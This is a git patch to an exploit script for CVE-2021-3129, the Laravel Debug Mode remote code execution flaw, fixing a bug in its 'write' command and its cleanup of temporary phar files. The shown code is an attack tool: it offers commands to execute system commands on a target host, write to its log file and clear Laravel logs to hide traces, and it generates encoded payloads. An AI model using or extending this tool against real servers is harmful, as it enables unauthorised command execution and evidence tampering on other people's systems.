From 5f1cbbbb78a560e84ffd65082273d1aa570e03bd Mon Sep 17 00:00:00 2001
From: joshua-orderdaily <joshua@jvdpoll.nl>
Date: Tue, 19 Apr 2022 00:06:07 +0200
Subject: [PATCH] Fixed write option & optimized deletion of temp files

---
 CVE-2021-3129.py | 10 +++++-----
 1 file changed, 5 insertions(+), 5 deletions(-)

diff --git a/CVE-2021-3129.py b/CVE-2021-3129.py
index b375f4b..efa3d57 100644
--- a/CVE-2021-3129.py
+++ b/CVE-2021-3129.py
@@ -54,7 +54,7 @@ def ask_command(self):
             self.cmd_clear_logs()
         elif response[0:7] == "execute":
             self.cmd_execute_cmd(response[8:])
-        elif response[0:7] == "write":
+        elif response[0:5] == "write":
             self.cmd_execute_write(response[6:])
         else:
             print(RED + f"[!] No command found named \"{response}\".")
@@ -67,7 +67,7 @@ def cmd_help(self):
         print(DARKCYAN + "    help - Shows available commands.")
         print(DARKCYAN + "    clear_logs - Clears Laravel logs.")
         print(DARKCYAN + "    execute <command> - Execute system command.")
-        print(DARKCYAN + "    write <command> - Write to log file.")
+        print(DARKCYAN + "    write <text> - Write to log file.")
 
     def cmd_clear_logs(self):
         print(DARKCYAN + f"[@] Clearing Laravel logs...")
@@ -205,7 +205,8 @@ def generate_payload(self, command: str, padding=0) -> str:
         payload = 'A' * padding + payload
         payload = payload.replace("\n", "") + "A"
 
-        os.unlink("./tmp.phar")
+        if os.path.exists('./tmp.phar'):
+            os.unlink("./tmp.phar")
 
         print(GREEN + f"[√] Generated payload.")
         return payload
@@ -216,7 +217,6 @@ def generate_write_payload(self, text: str, padding=0) -> str:
         payload = base64.b64encode(text.encode()).decode().rstrip('=')
         payload = ''.join(c + '=00' for c in payload)
         payload = 'A' * padding + payload
-        os.unlink("./tmp.phar")
 
         print(GREEN + f"[√] Generated payload.")
         return payload
@@ -319,7 +319,7 @@ def find_laravel_version(self, content: str):
 
 if __name__ == "__main__":
     print(PURPLE + BOLD + "Laravel Debug Mode CVE script")
-    print(END + PURPLE + "[•] Made by: https://jvdpoll.nl" + RED)
+    print(END + PURPLE + "[•] Made by: https://github.com/joshuavanderpoll/CVE-2021-3129" + RED)
 
     parser = argparse.ArgumentParser(description='Exploit CVE-2021-3129 - Laravel vulnerability exploit script')
     parser.add_argument('--host', help='Host URL to use exploit on', required=True)